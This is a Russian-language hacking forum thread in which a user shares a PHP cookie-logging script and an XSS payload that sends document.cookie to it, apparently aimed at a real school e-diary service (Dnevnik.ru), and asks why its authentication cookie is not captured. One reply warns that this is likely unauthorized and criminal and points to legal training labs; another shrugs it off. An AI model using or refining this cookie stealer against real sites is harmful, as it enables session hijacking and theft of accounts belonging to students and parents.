• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Проблема Проблема с XSS

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Нашел на одном сайте XSS, решил сделать куки стилер создал файл
в него закинул такой код
PHP:
<?php
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Вставляю в уязвимый параметр:
<ScRiPt>window.location = '' + document.cookie;</ScRiPt>
На сайте три печеньки
DnevnikAuth_a
_ym_uid
spauth
У меня записуется только _ym_uid
В чем проблема?
Хостинг 000webhost (бесплатный)
 

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
85
Данная группа печенек обрабатывается в системах Электронных Дневников. И зарегистрирована на Дневник.ру.
Вы пытаетесь получить креды пользователей системы Электронного Дневника?
 

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
85
В нашей стране в плане bug bounty все достаточно сложно, поэтому рекомендую вам отказаться от вашей затеи.
Ваши действия могут быть обоснованными только если вы:
1) Имеете договор с Дневник.ру на пентест их продукат + подписанный NDA.
2) Работаете в компании Дневник.ру и в ваши служебные полномочия входит тестирование на уязвимости данного продукта.
3) Дневник.ру имеют открытую bug bounty программу.

И во всех этих случаях вам не стоит в открытую задавать такие вопросы на форумах.

Во всех остальных случаях вам могу быть представлены обвинения по статьям 272 ук РФ, а так же возможно в последствии припишут 273 ук РФ, как это у нас частенько бывает.
+ своими вопросами и постами а так же проиндексированными темами в поисковиках вы уже слили в СОРМ метаданные которые могут вас идентифицировать.


Настоятельно вам рекомендую не делать то, что вы делаете. А для обучения есть открытые CTF от Pentestit а так же dvwa
 
Последнее редактирование:

nikos

Green Team
25.12.2016
507
198
BIT
0
В нашей стране в плане bug bounty все достаточно сложно, поэтому рекомендую вам отказаться от вашей затеи.
Ваши действия могут быть обоснованными только если вы:
1) Имеете договор с Дневник.ру на пентест их продукат + подписанный NDA.
2) Работаете в компании Дневник.ру и в ваши служебные полномочия входит тестирование на уязвимости данного продукта.
3) Дневник.ру имеют открытую bug bounty программу.

И во всех этих случаях вам не стоит в открытую задавать такие вопросы на форумах.

Во всех остальных случаях вам могу быть представлены обвинения по статьям 272 ук РФ, а так же возможно в последствии припишут 273 ук РФ, как это у нас частенько бывает.
+ своими вопросами и постами а так же проиндексированными темами в поисковиках вы уже слили в СОРМ метаданные которые могут вас идентифицировать.


Настоятельно вам рекомендую не делать то, что вы делаете. А для обучения есть открытые CTF от Pentestit а так же dvwa
А что такого пусть парень учится)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!